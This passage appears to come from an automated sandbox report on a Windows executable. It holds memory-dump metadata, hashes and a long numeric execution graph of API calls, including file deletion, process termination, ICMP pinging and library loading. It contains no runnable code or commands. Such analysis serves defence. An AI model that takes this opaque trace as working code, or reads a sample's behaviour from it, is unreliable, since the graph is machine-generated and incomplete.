                                                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                          Execution Graph

                                                                          Execution Coverage:4.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:2.1%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:108
98590 2d96dc 98588->98590 98589 2f0fe6 Mailbox 59 API calls 98591 2d970e 98589->98591 98593 2f0fe6 Mailbox 59 API calls 98590->98593 98591->98603 98605 2dcca0 98591->98605 98592 3122a0 98617 33a48d 89 API calls 4 library calls 98592->98617 98593->98597 98596->98493 98597->98589 98597->98591 98597->98603 98599 312278 98616 33a48d 89 API calls 4 library calls 98599->98616 98601 312253 98615 33a48d 89 API calls 4 library calls 98601->98615 98603->98580 98603->98592 98603->98596 98603->98599 98603->98601 98614 2d8180 277 API calls 98603->98614 98604->98495 98606 2dccda 98605->98606 98607 2dcd02 98605->98607 98608 2d9c80 277 API calls 98606->98608 98609 2dcce0 98606->98609 98607->98609 98610 314971 98607->98610 98611 2d53b0 277 API calls 98607->98611 98608->98609 98609->98603 98610->98609 98620 33a48d 89 API calls 4 library calls 98610->98620 98611->98610 98613->98579 98614->98603 98615->98596 98616->98596 98617->98596 98618->98575 98619->98577 98620->98609 98623 2e1bdc 98621->98623 98624 2e1bef _memmove 98621->98624 98622 2f0fe6 Mailbox 59 API calls 98622->98624 98623->98622 98623->98624 98624->98523 98625->98523 98636 2f2e74 98626->98636 98628 2f2f7b 98628->98511 98629->98523 98630->98523 98631->98523 98632->98523 98633->98519 98634->98523 98635->98523 98637 2f2e80 __lseeki64 98636->98637 98644 2f3447 98637->98644 98643 2f2ea7 __lseeki64 98643->98628 98661 2f9e3b 98644->98661 98646 2f2e89 98647 2f2eb8 DecodePointer DecodePointer 98646->98647 98648 2f2e95 98647->98648 98649 2f2ee5 98647->98649 98658 2f2eb2 98648->98658 98649->98648 98668 2f89d4 59 API calls __fptostr 98649->98668 98651 2f2f48 EncodePointer EncodePointer 98651->98648 98652 2f2ef7 98652->98651 98653 2f2f1c 98652->98653 98669 2f8a94 61 API calls 2 library calls 98652->98669 98653->98648 98656 2f2f36 EncodePointer 98653->98656 98670 2f8a94 61 API calls 2 library calls 98653->98670 98656->98651 98657 2f2f30 98657->98648 98657->98656 98671 2f3450 98658->98671 98662 2f9e5f EnterCriticalSection 98661->98662 
98663 2f9e4c 98661->98663 98662->98646 98664 2f9ec3 __mtinitlocknum 57 API calls 98663->98664 98665 2f9e52 98664->98665 98665->98662 98666 2f32e5 _copy_environ 57 API calls 98665->98666 98667 2f9e5e 98666->98667 98667->98662 98668->98652 98669->98653 98670->98657 98672 2f9fa5 _doexit LeaveCriticalSection 98671->98672 98673 2f2eb7 98672->98673 98673->98643 98675 2d4d37 84 API calls 98674->98675 98676 34d203 98675->98676 98695 34d24a Mailbox 98676->98695 98712 34de8e 98676->98712 98678 34d4a2 98679 34d617 98678->98679 98683 34d4b0 98678->98683 98751 34dfb1 92 API calls Mailbox 98679->98751 98682 34d626 98682->98683 98684 34d632 98682->98684 98725 34d057 98683->98725 98684->98695 98685 2d4d37 84 API calls 98703 34d29b Mailbox 98685->98703 98690 34d4e9 98740 2f0e38 98690->98740 98693 34d503 98747 33a48d 89 API calls 4 library calls 98693->98747 98694 34d51c 98696 2d47be 59 API calls 98694->98696 98695->98530 98698 34d528 98696->98698 98700 2d4540 59 API calls 98698->98700 98699 34d50e GetCurrentProcess TerminateProcess 98699->98694 98701 34d53e 98700->98701 98711 34d565 98701->98711 98748 2d4230 59 API calls Mailbox 98701->98748 98703->98678 98703->98685 98703->98695 98745 33fc0d 59 API calls 2 library calls 98703->98745 98746 34d6c8 61 API calls 2 library calls 98703->98746 98704 34d68d 98704->98695 98708 34d6a1 FreeLibrary 98704->98708 98705 34d554 98749 34dd32 107 API calls _free 98705->98749 98708->98695 98710 2d523c 59 API calls 98710->98711 98711->98704 98711->98710 98750 2d4230 59 API calls Mailbox 98711->98750 98752 34dd32 107 API calls _free 98711->98752 98713 2e1aa4 59 API calls 98712->98713 98714 34dea9 CharLowerBuffW 98713->98714 98753 32f903 98714->98753 98718 2e1207 59 API calls 98719 34dee2 98718->98719 98720 2e1462 59 API calls 98719->98720 98722 34def9 98720->98722 98721 34df41 Mailbox 98721->98703 98723 2e1981 59 API calls 98722->98723 98724 34df05 Mailbox 98723->98724 98724->98721 98760 34d6c8 61 API calls 2 library calls 98724->98760 98726 34d072 
98725->98726 98727 34d0c7 98725->98727 98728 2f0fe6 Mailbox 59 API calls 98726->98728 98731 34e139 98727->98731 98730 34d094 98728->98730 98729 2f0fe6 Mailbox 59 API calls 98729->98730 98730->98727 98730->98729 98732 34e362 Mailbox 98731->98732 98739 34e15c _strcat _wcscpy __NMSG_WRITE 98731->98739 98732->98690 98733 2d50d5 59 API calls 98733->98739 98734 2d502b 59 API calls 98734->98739 98735 2d5087 59 API calls 98735->98739 98736 2d4d37 84 API calls 98736->98739 98737 2f593c 58 API calls __crtGetStringTypeA_stat 98737->98739 98739->98732 98739->98733 98739->98734 98739->98735 98739->98736 98739->98737 98763 335e42 61 API calls 2 library calls 98739->98763 98742 2f0e4d 98740->98742 98741 2f0ee5 LoadLibraryExW 98744 2f0eb3 98741->98744 98742->98741 98743 2f0ed3 FindCloseChangeNotification 98742->98743 98742->98744 98743->98744 98744->98693 98744->98694 98745->98703 98746->98703 98747->98699 98748->98705 98749->98711 98750->98711 98751->98682 98752->98711 98755 32f92e __NMSG_WRITE 98753->98755 98754 32f96d 98754->98718 98754->98724 98755->98754 98758 32f963 98755->98758 98759 32fa14 98755->98759 98758->98754 98761 2e14db 61 API calls 98758->98761 98759->98754 98762 2e14db 61 API calls 98759->98762 98760->98721 98761->98758 98762->98759 98763->98739 98765 2e1207 59 API calls 98764->98765 98766 334024 98765->98766 98767 2e1207 59 API calls 98766->98767 98768 33402d 98767->98768 98769 2e1207 59 API calls 98768->98769 98770 334036 98769->98770 98789 2f0284 98770->98789 98775 33405c 98777 2f0119 59 API calls 98775->98777 98778 334070 FindFirstFileW 98777->98778 98779 33408f 98778->98779 98780 3340fc FindClose 98778->98780 98779->98780 98783 334093 98779->98783 98786 334107 Mailbox 98780->98786 98781 3340d7 FindNextFileW 98781->98779 98781->98783 98782 2e1c9c 59 API calls 98782->98783 98783->98779 98783->98781 98783->98782 98784 2e17e0 59 API calls 98783->98784 98785 2e1900 59 API calls 98783->98785 98784->98783 98787 3340c8 DeleteFileW 98785->98787 98786->98538 
98787->98781 98788 3340f3 FindClose 98787->98788 98788->98786 98808 301b70 98789->98808 98792 2f02cd 98795 2e19e1 59 API calls 98792->98795 98793 2f02b0 98794 2e1821 59 API calls 98793->98794 98796 2f02bc 98794->98796 98795->98796 98810 2e133d 98796->98810 98799 334fec GetFileAttributesW 98800 33404a 98799->98800 98800->98775 98801 2e1900 98800->98801 98802 31f534 98801->98802 98803 2e1914 98801->98803 98805 2e1c7e 59 API calls 98802->98805 98814 2e18a5 98803->98814 98807 31f53f __NMSG_WRITE _memmove 98805->98807 98806 2e191f 98806->98775 98809 2f0291 GetFullPathNameW 98808->98809 98809->98792 98809->98793 98811 2e134b 98810->98811 98812 2e1981 59 API calls 98811->98812 98813 2e135b 98812->98813 98813->98799 98815 2e18b4 __NMSG_WRITE 98814->98815 98816 2e1c7e 59 API calls 98815->98816 98817 2e18c5 _memmove 98815->98817 98818 31f4f1 _memmove 98816->98818 98817->98806 98854 336735 98819->98854 98822 3368b1 98824 336921 98822->98824 98828 336917 98822->98828 98833 3368ca 98822->98833 98823 336899 98870 336a73 89 API calls 2 library calls 98823->98870 98826 336951 98824->98826 98827 33699f 98824->98827 98845 33683d _memmove 98824->98845 98831 336971 98826->98831 98832 336956 98826->98832 98829 3369a6 98827->98829 98830 336a3a 98827->98830 98828->98824 98834 3368fe 98828->98834 98835 3369a9 98829->98835 98836 336a1c 98829->98836 98830->98845 98879 2d50d5 59 API calls 98830->98879 98831->98845 98875 2d5087 59 API calls 98831->98875 98832->98845 98874 2d5087 59 API calls 98832->98874 98871 338cd0 61 API calls 98833->98871 98861 337c7f 98834->98861 98839 3369e5 98835->98839 98840 3369ad 98835->98840 98836->98845 98878 2d50d5 59 API calls 98836->98878 98839->98845 98877 2d50d5 59 API calls 98839->98877 98840->98845 98876 2d50d5 59 API calls 98840->98876 98845->98548 98847 3368d2 98872 338cd0 61 API calls 98847->98872 98850 3368e9 _memmove 98873 338cd0 61 API calls 98850->98873 98852->98543 98853->98546 98855 336785 98854->98855 98859 336746 98854->98859 98890 2d502b 59 API 
calls 98855->98890 98856 336783 98856->98822 98856->98823 98856->98845 98858 2d4d37 84 API calls 98858->98859 98859->98856 98859->98858 98880 2f312d 98859->98880 98862 337c8a 98861->98862 98863 2f0fe6 Mailbox 59 API calls 98862->98863 98864 337c91 98863->98864 98865 337cbe 98864->98865 98866 337c9d 98864->98866 98868 2f0fe6 Mailbox 59 API calls 98865->98868 98867 2f0fe6 Mailbox 59 API calls 98866->98867 98869 337ca6 _memset 98867->98869 98868->98869 98869->98845 98870->98845 98871->98847 98872->98850 98873->98834 98874->98845 98875->98845 98876->98845 98877->98845 98878->98845 98879->98845 98881 2f31ae 98880->98881 98882 2f3139 98880->98882 98893 2f31c0 60 API calls 3 library calls 98881->98893 98889 2f315e 98882->98889 98891 2f8d58 58 API calls __getptd_noexit 98882->98891 98885 2f31bb 98885->98859 98886 2f3145 98892 2f8fe6 9 API calls __fptostr 98886->98892 98888 2f3150 98888->98859 98889->98859 98890->98856 98891->98886 98892->98888 98893->98885 98895 2d3b3f 98894->98895 98901 2d3b67 98894->98901 98896 2d3b31 59 API calls 98895->98896 98897 2d3b4d 98895->98897 98896->98897 98898 2d3b53 98897->98898 98899 2d3b31 59 API calls 98897->98899 98898->98901 98904 2d5190 59 API calls Mailbox 98898->98904 98899->98898 98901->98438 98902->98444 98903->98436 98904->98901 98906 2d3e11 98905->98906 98907 2d3c43 98905->98907 98906->98458 98908 2e1207 59 API calls 98907->98908 98911 2d3c54 98907->98911 98909 2d3e73 98908->98909 98910 2f2f70 __cinit 67 API calls 98909->98910 98910->98911 98911->98458 98912->98471 98913->97970 98914->97967 98915->97863 98916->97862 98917->97859 98918->97862 98919->97858 98921 2f59b7 98920->98921 98926 2f5948 98920->98926 98946 2f35d1 DecodePointer 98921->98946 98923 2f59bd 98947 2f8d58 58 API calls __getptd_noexit 98923->98947 98924 2f5953 98924->98926 98940 2fa39b 58 API calls __NMSG_WRITE 98924->98940 98941 2fa3f8 58 API calls 6 library calls 98924->98941 98942 2f32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 
98924->98942 98926->98924 98928 2f597b RtlAllocateHeap 98926->98928 98931 2f59a3 98926->98931 98935 2f59a1 98926->98935 98943 2f35d1 DecodePointer 98926->98943 98928->98926 98930 2f59af 98928->98930 98930->97866 98944 2f8d58 58 API calls __getptd_noexit 98931->98944 98945 2f8d58 58 API calls __getptd_noexit 98935->98945 98937->97866 98938->97871 98939->97873 98940->98924 98941->98924 98943->98926 98944->98935 98945->98930 98946->98923 98947->98930 98948 2d9a88 98951 2d86e0 98948->98951 98952 2d86fd 98951->98952 98953 310ff8 98952->98953 98954 310fad 98952->98954 98958 2d8724 98952->98958 98991 34aad0 277 API calls __cinit 98953->98991 98957 310fb5 98954->98957 98954->98958 98961 310fc2 98954->98961 98989 34b0e4 277 API calls 98957->98989 98960 2f2f70 __cinit 67 API calls 98958->98960 98965 3111af 98958->98965 98968 2d8a17 98958->98968 98969 2d39be 68 API calls 98958->98969 98973 2d523c 59 API calls 98958->98973 98974 2d3f42 68 API calls 98958->98974 98975 2d3c30 68 API calls 98958->98975 98976 2d898d 98958->98976 98977 2d53b0 277 API calls 98958->98977 98978 2e1c9c 59 API calls 98958->98978 98980 2d3938 68 API calls 98958->98980 98981 2d855e 277 API calls 98958->98981 98982 2d5278 98958->98982 98987 2d84e2 89 API calls 98958->98987 98988 2d835f 277 API calls 98958->98988 98992 3273ab 59 API calls 98958->98992 98960->98958 98961->98976 98990 34b58c 277 API calls 3 library calls 98961->98990 98963 311289 98963->98963 98993 34ae3b 89 API calls 98965->98993 98969->98958 98973->98958 98974->98958 98975->98958 98976->98968 98994 33a48d 89 API calls 4 library calls 98976->98994 98977->98958 98978->98958 98980->98958 98981->98958 98983 2f0fe6 Mailbox 59 API calls 98982->98983 98984 2d5285 98983->98984 98985 2d5294 98984->98985 98986 2e1a36 59 API calls 98984->98986 98985->98958 98986->98985 98987->98958 98988->98958 98989->98961 98990->98976 98991->98958 98992->98958 98993->98976 98994->98963 98995 2d9b8b 98996 2d86e0 277 API calls 98995->98996 98997 2d9b99 98996->98997 
98998 30e438 99003 2d6152 Mailbox 98998->99003 99000 30efeb 99074 326cf1 59 API calls Mailbox 99000->99074 99002 30eff4 99003->99000 99003->99002 99005 30e2e9 VariantClear 99003->99005 99006 2d6af8 99003->99006 99008 34e60c 130 API calls 99003->99008 99013 345e1d 99003->99013 99038 2dcfd7 99003->99038 99057 34ebba 99003->99057 99063 34ec68 99003->99063 99071 2d5190 59 API calls Mailbox 99003->99071 99072 327aad 59 API calls 99003->99072 99005->99003 99073 33a48d 89 API calls 4 library calls 99006->99073 99008->99003 99014 345e46 99013->99014 99015 345e74 WSAStartup 99014->99015 99088 2d502b 59 API calls 99014->99088 99017 345e9d 99015->99017 99018 345e88 Mailbox 99015->99018 99075 2e40cd 99017->99075 99018->99003 99020 345e61 99020->99015 99089 2d502b 59 API calls 99020->99089 99022 2d4d37 84 API calls 99024 345eb2 99022->99024 99080 2e402a WideCharToMultiByte 99024->99080 99025 345e70 99025->99015 99027 345ebf inet_addr gethostbyname 99027->99018 99028 345edd IcmpCreateFile 99027->99028 99028->99018 99029 345f01 99028->99029 99030 2f0fe6 Mailbox 59 API calls 99029->99030 99031 345f1a 99030->99031 99032 2e433f 59 API calls 99031->99032 99033 345f25 99032->99033 99034 345f34 IcmpSendEcho 99033->99034 99035 345f55 IcmpSendEcho 99033->99035 99036 345f6d 99034->99036 99035->99036 99037 345fd4 IcmpCloseHandle WSACleanup 99036->99037 99037->99018 99039 2d4d37 84 API calls 99038->99039 99040 2dd001 99039->99040 99041 2d5278 59 API calls 99040->99041 99042 2dd018 99041->99042 99043 2dd57b 99042->99043 99053 2dd439 Mailbox __NMSG_WRITE 99042->99053 99107 2d502b 59 API calls 99042->99107 99043->99003 99045 2f312d _W_store_winword 60 API calls 99045->99053 99046 2e162d 59 API calls 99046->99053 99047 2f0c65 62 API calls 99047->99053 99049 2d4f98 59 API calls 99049->99053 99051 2d502b 59 API calls 99051->99053 99052 2d4d37 84 API calls 99052->99053 99053->99043 99053->99045 99053->99046 99053->99047 99053->99049 99053->99051 99053->99052 99054 2e1821 59 API calls 99053->99054 
99092 2e59d3 99053->99092 99103 2e5ac3 99053->99103 99108 2e153b 59 API calls 2 library calls 99053->99108 99109 2d4f3c 59 API calls Mailbox 99053->99109 99054->99053 99060 34ebcd 99057->99060 99058 2d4d37 84 API calls 99059 34ec0a 99058->99059 99147 337ce4 99059->99147 99060->99058 99062 34ebdc 99060->99062 99062->99003 99064 34ecab 99063->99064 99070 34ec84 99063->99070 99065 34eccd 99064->99065 99191 2d502b 59 API calls 99064->99191 99068 34ed11 99065->99068 99065->99070 99192 2d502b 59 API calls 99065->99192 99188 3367fc 99068->99188 99070->99003 99071->99003 99072->99003 99073->99000 99074->99002 99076 2f0fe6 Mailbox 59 API calls 99075->99076 99077 2e40e0 99076->99077 99078 2e1c7e 59 API calls 99077->99078 99079 2e40ed 99078->99079 99079->99022 99081 2e404e 99080->99081 99082 2e4085 99080->99082 99084 2f0fe6 Mailbox 59 API calls 99081->99084 99091 2e3f20 59 API calls Mailbox 99082->99091 99085 2e4055 WideCharToMultiByte 99084->99085 99090 2e3f79 59 API calls 2 library calls 99085->99090 99087 2e4077 99087->99027 99088->99020 99089->99025 99090->99087 99091->99087 99093 2e59fe _memset 99092->99093 99110 2e5800 99093->99110 99096 2e5a83 99098 2e5a9d Shell_NotifyIconW 99096->99098 99099 2e5ab9 Shell_NotifyIconW 99096->99099 99100 2e5aab 99098->99100 99099->99100 99114 2e56f8 99100->99114 99102 2e5ab2 99102->99053 99104 2e5b25 99103->99104 99105 2e5ad5 _memset 99103->99105 99104->99053 99106 2e5af4 Shell_NotifyIconW 99105->99106 99106->99104 99107->99053 99108->99053 99109->99053 99111 2e581c 99110->99111 99112 2e5810 99110->99112 99111->99112 99113 2e5821 DestroyIcon 99111->99113 99112->99096 99144 3334dd 62 API calls _W_store_winword 99112->99144 99113->99112 99115 2e57fa Mailbox 99114->99115 99116 2e5715 99114->99116 99115->99102 99117 2e162d 59 API calls 99116->99117 99118 2e5723 99117->99118 99119 320c4c LoadStringW 99118->99119 99120 2e5730 99118->99120 99123 320c66 99119->99123 99121 2e1821 59 API calls 99120->99121 99122 2e5745 99121->99122 99124 2e5752 
99122->99124 99130 320c74 99122->99130 99125 2e1c9c 59 API calls 99123->99125 99124->99123 99126 2e5760 99124->99126 99132 2e5778 _memset _wcscpy 99125->99132 99127 2e1900 59 API calls 99126->99127 99128 2e576a 99127->99128 99129 2e17e0 59 API calls 99128->99129 99129->99132 99131 320cb7 Mailbox 99130->99131 99130->99132 99133 2e1207 59 API calls 99130->99133 99146 2f38c8 83 API calls 3 library calls 99131->99146 99134 2e57e0 Shell_NotifyIconW 99132->99134 99135 320c9e 99133->99135 99134->99115 99145 330252 60 API calls Mailbox 99135->99145 99138 320ca9 99140 2e17e0 59 API calls 99138->99140 99139 320cd6 99141 2e1900 59 API calls 99139->99141 99140->99131 99142 320ce7 99141->99142 99143 2e1900 59 API calls 99142->99143 99143->99132 99144->99096 99145->99138 99146->99139 99148 337cf1 99147->99148 99149 2f0fe6 Mailbox 59 API calls 99148->99149 99150 337cf8 99149->99150 99153 336135 99150->99153 99152 337d3b Mailbox 99152->99062 99154 2e1aa4 59 API calls 99153->99154 99155 336148 CharLowerBuffW 99154->99155 99158 33615b 99155->99158 99156 2e1609 59 API calls 99156->99158 99157 336195 99159 3361a7 99157->99159 99160 2e1609 59 API calls 99157->99160 99158->99156 99158->99157 99170 336165 _memset Mailbox 99158->99170 99161 2f0fe6 Mailbox 59 API calls 99159->99161 99160->99159 99165 3361d5 99161->99165 99164 336233 99167 2f0fe6 Mailbox 59 API calls 99164->99167 99164->99170 99166 3361f4 99165->99166 99186 336071 59 API calls 99165->99186 99171 336292 99166->99171 99168 33624d 99167->99168 99169 2f0fe6 Mailbox 59 API calls 99168->99169 99169->99170 99170->99152 99172 2e1207 59 API calls 99171->99172 99173 3362c4 99172->99173 99174 2e1207 59 API calls 99173->99174 99175 3362cd 99174->99175 99176 2e1207 59 API calls 99175->99176 99183 3362d6 _wcscmp 99176->99183 99177 2e153b 59 API calls 99177->99183 99178 2e1821 59 API calls 99178->99183 99179 2f3836 GetStringTypeW 99179->99183 99181 2f37ba 59 API calls 99181->99183 99182 336292 60 API calls 99182->99183 99183->99177 
99183->99178 99183->99179 99183->99181 99183->99182 99184 3365ab Mailbox 99183->99184 99185 2e1c9c 59 API calls 99183->99185 99187 2f385c GetStringTypeW _iswctype 99183->99187 99184->99164 99185->99183 99186->99165 99187->99183 99189 336818 92 API calls 99188->99189 99190 336813 99189->99190 99190->99070 99191->99065 99192->99068 99193 30dc5a 99194 2f0fe6 Mailbox 59 API calls 99193->99194 99195 30dc61 99194->99195 99196 2f0fe6 Mailbox 59 API calls 99195->99196 99198 30dc7a _memmove 99195->99198 99196->99198 99197 2f0fe6 Mailbox 59 API calls 99199 30dc9f 99197->99199 99198->99197 99200 2d1066 99205 2daaaa 99200->99205 99202 2d106c 99203 2f2f70 __cinit 67 API calls 99202->99203 99204 2d1076 99203->99204 99206 2daacb 99205->99206 99238 2f02eb 99206->99238 99210 2dab12 99211 2e1207 59 API calls 99210->99211 99212 2dab1c 99211->99212 99213 2e1207 59 API calls 99212->99213 99214 2dab26 99213->99214 99215 2e1207 59 API calls 99214->99215 99216 2dab30 99215->99216 99217 2e1207 59 API calls 99216->99217 99218 2dab6e 99217->99218 99219 2e1207 59 API calls 99218->99219 99220 2dac39 99219->99220 99248 2f0588 99220->99248 99224 2dac6b 99225 2e1207 59 API calls 99224->99225 99226 2dac75 99225->99226 99276 2efe2b 99226->99276 99228 2dacbc 99229 2daccc GetStdHandle 99228->99229 99230 2dad18 99229->99230 99231 312f39 99229->99231 99232 2dad20 OleInitialize 99230->99232 99231->99230 99233 312f42 99231->99233 99232->99202 99283 3370f3 64 API calls Mailbox 99233->99283 99235 312f49 99284 3377c2 CreateThread 99235->99284 99237 312f55 CloseHandle 99237->99232 99285 2f03c4 99238->99285 99241 2f03c4 59 API calls 99242 2f032d 99241->99242 99243 2e1207 59 API calls 99242->99243 99244 2f0339 99243->99244 99245 2e1821 59 API calls 99244->99245 99246 2daad1 99245->99246 99247 2f07bb 6 API calls 99246->99247 99247->99210 99249 2e1207 59 API calls 99248->99249 99250 2f0598 99249->99250 99251 2e1207 59 API calls 99250->99251 99252 2f05a0 99251->99252 99292 2e10c3 99252->99292 99255 2e10c3 59 API 
calls 99256 2f05b0 99255->99256 99257 2e1207 59 API calls 99256->99257 99258 2f05bb 99257->99258 99259 2f0fe6 Mailbox 59 API calls 99258->99259 99260 2dac43 99259->99260 99261 2eff4c 99260->99261 99262 2eff5a 99261->99262 99263 2e1207 59 API calls 99262->99263 99264 2eff65 99263->99264 99265 2e1207 59 API calls 99264->99265 99266 2eff70 99265->99266 99267 2e1207 59 API calls 99266->99267 99268 2eff7b 99267->99268 99269 2e1207 59 API calls 99268->99269 99270 2eff86 99269->99270 99271 2e10c3 59 API calls 99270->99271 99272 2eff91 99271->99272 99273 2f0fe6 Mailbox 59 API calls 99272->99273 99274 2eff98 RegisterWindowMessageW 99273->99274 99274->99224 99277 2efe3b 99276->99277 99278 32620c 99276->99278 99280 2f0fe6 Mailbox 59 API calls 99277->99280 99295 33a12a 59 API calls 99278->99295 99282 2efe43 99280->99282 99281 326217 99282->99228 99283->99235 99284->99237 99296 3377a8 65 API calls 99284->99296 99286 2e1207 59 API calls 99285->99286 99287 2f03cf 99286->99287 99288 2e1207 59 API calls 99287->99288 99289 2f03d7 99288->99289 99290 2e1207 59 API calls 99289->99290 99291 2f0323 99290->99291 99291->99241 99293 2e1207 59 API calls 99292->99293 99294 2e10cb 99293->99294 99294->99255 99295->99281 99297 2f7e83 99298 2f7e8f __lseeki64 99297->99298 99334 2fa038 GetStartupInfoW 99298->99334 99301 2f7eec 99303 2f7ef7 99301->99303 99419 2f7fd3 58 API calls 3 library calls 99301->99419 99302 2f7e94 99336 2f8dac GetProcessHeap 99302->99336 99337 2f9d16 99303->99337 99306 2f7efd 99307 2f7f08 __RTC_Initialize 99306->99307 99420 2f7fd3 58 API calls 3 library calls 99306->99420 99358 2fd802 99307->99358 99310 2f7f17 99311 2f7f23 GetCommandLineW 99310->99311 99421 2f7fd3 58 API calls 3 library calls 99310->99421 99377 305153 GetEnvironmentStringsW 99311->99377 99314 2f7f22 99314->99311 99317 2f7f3d 99318 2f7f48 99317->99318 99422 2f32e5 58 API calls 3 library calls 99317->99422 99387 304f88 99318->99387 99321 2f7f4e 99324 2f7f59 99321->99324 99423 2f32e5 58 API calls 3 library calls 
99321->99423 99401 2f331f 99324->99401 99325 2f7f61 99326 2f7f6c __wwincmdln 99325->99326 99424 2f32e5 58 API calls 3 library calls 99325->99424 99407 2e5f8b 99326->99407 99329 2f7f80 99330 2f7f8f 99329->99330 99425 2f3588 58 API calls _doexit 99329->99425 99426 2f3310 58 API calls _doexit 99330->99426 99333 2f7f94 __lseeki64 99335 2fa04e 99334->99335 99335->99302 99336->99301 99427 2f33b7 36 API calls 2 library calls 99337->99427 99339 2f9d1b 99428 2f9f6c InitializeCriticalSectionAndSpinCount __getstream 99339->99428 99341 2f9d20 99342 2f9d24 99341->99342 99430 2f9fba TlsAlloc 99341->99430 99429 2f9d8c 61 API calls 2 library calls 99342->99429 99345 2f9d29 99345->99306 99346 2f9d36 99346->99342 99347 2f9d41 99346->99347 99431 2f8a05 99347->99431 99350 2f9d83 99439 2f9d8c 61 API calls 2 library calls 99350->99439 99353 2f9d88 99353->99306 99354 2f9d62 99354->99350 99355 2f9d68 99354->99355 99438 2f9c63 58 API calls 4 library calls 99355->99438 99357 2f9d70 GetCurrentThreadId 99357->99306 99359 2fd80e __lseeki64 99358->99359 99360 2f9e3b __lock 58 API calls 99359->99360 99361 2fd815 99360->99361 99362 2f8a05 __calloc_crt 58 API calls 99361->99362 99363 2fd826 99362->99363 99364 2fd891 GetStartupInfoW 99363->99364 99365 2fd831 __lseeki64 @_EH4_CallFilterFunc@8 99363->99365 99367 2fd9d5 99364->99367 99369 2fd8a6 99364->99369 99365->99310 99366 2fda9d 99453 2fdaad LeaveCriticalSection _doexit 99366->99453 99367->99366 99371 2fda22 GetStdHandle 99367->99371 99373 2fda35 GetFileType 99367->99373 99452 2fa05b InitializeCriticalSectionAndSpinCount 99367->99452 99369->99367 99370 2f8a05 __calloc_crt 58 API calls 99369->99370 99372 2fd8f4 99369->99372 99370->99369 99371->99367 99372->99367 99374 2fd928 GetFileType 99372->99374 99451 2fa05b InitializeCriticalSectionAndSpinCount 99372->99451 99373->99367 99374->99372 99378 305164 99377->99378 99379 2f7f33 99377->99379 99454 2f8a4d 58 API calls 2 library calls 99378->99454 99383 304d4b GetModuleFileNameW 99379->99383 99381 
30518a _memmove 99382 3051a0 FreeEnvironmentStringsW 99381->99382 99382->99379 99384 304d7f _wparse_cmdline 99383->99384 99386 304dbf _wparse_cmdline 99384->99386 99455 2f8a4d 58 API calls 2 library calls 99384->99455 99386->99317 99388 304fa1 __NMSG_WRITE 99387->99388 99389 304f99 99387->99389 99390 2f8a05 __calloc_crt 58 API calls 99388->99390 99389->99321 99391 304fca __NMSG_WRITE 99390->99391 99391->99389 99393 2f8a05 __calloc_crt 58 API calls 99391->99393 99394 305021 99391->99394 99395 305046 99391->99395 99398 30505d 99391->99398 99456 304837 58 API calls __fptostr 99391->99456 99393->99391 99457 2f2f85 99394->99457 99396 2f2f85 _free 58 API calls 99395->99396 99396->99389 99463 2f8ff6 IsProcessorFeaturePresent 99398->99463 99400 305069 99400->99321 99403 2f332b __IsNonwritableInCurrentImage 99401->99403 99487 2fa701 99403->99487 99404 2f3349 __initterm_e 99405 2f2f70 __cinit 67 API calls 99404->99405 99406 2f3368 __cinit __IsNonwritableInCurrentImage 99404->99406 99405->99406 99406->99325 99408 2e5fa5 99407->99408 99418 2e6044 99407->99418 99409 2e5fdf IsThemeActive 99408->99409 99490 2f359c 99409->99490 99413 2e600b 99502 2e5f00 SystemParametersInfoW SystemParametersInfoW 99413->99502 99415 2e6017 99503 2e5240 99415->99503 99417 2e601f SystemParametersInfoW 99417->99418 99418->99329 99419->99303 99420->99307 99421->99314 99425->99330 99426->99333 99427->99339 99428->99341 99429->99345 99430->99346 99434 2f8a0c 99431->99434 99433 2f8a47 99433->99350 99437 2fa016 TlsSetValue 99433->99437 99434->99433 99435 2f8a2a 99434->99435 99440 305426 99434->99440 99435->99433 99435->99434 99448 2fa362 Sleep 99435->99448 99437->99354 99438->99357 99439->99353 99441 305431 99440->99441 99446 30544c 99440->99446 99442 30543d 99441->99442 99441->99446 99449 2f8d58 58 API calls __getptd_noexit 99442->99449 99444 30545c HeapAlloc 99445 305442 99444->99445 99444->99446 99445->99434 99446->99444 99446->99445 99450 2f35d1 DecodePointer 99446->99450 99448->99435 99449->99445 
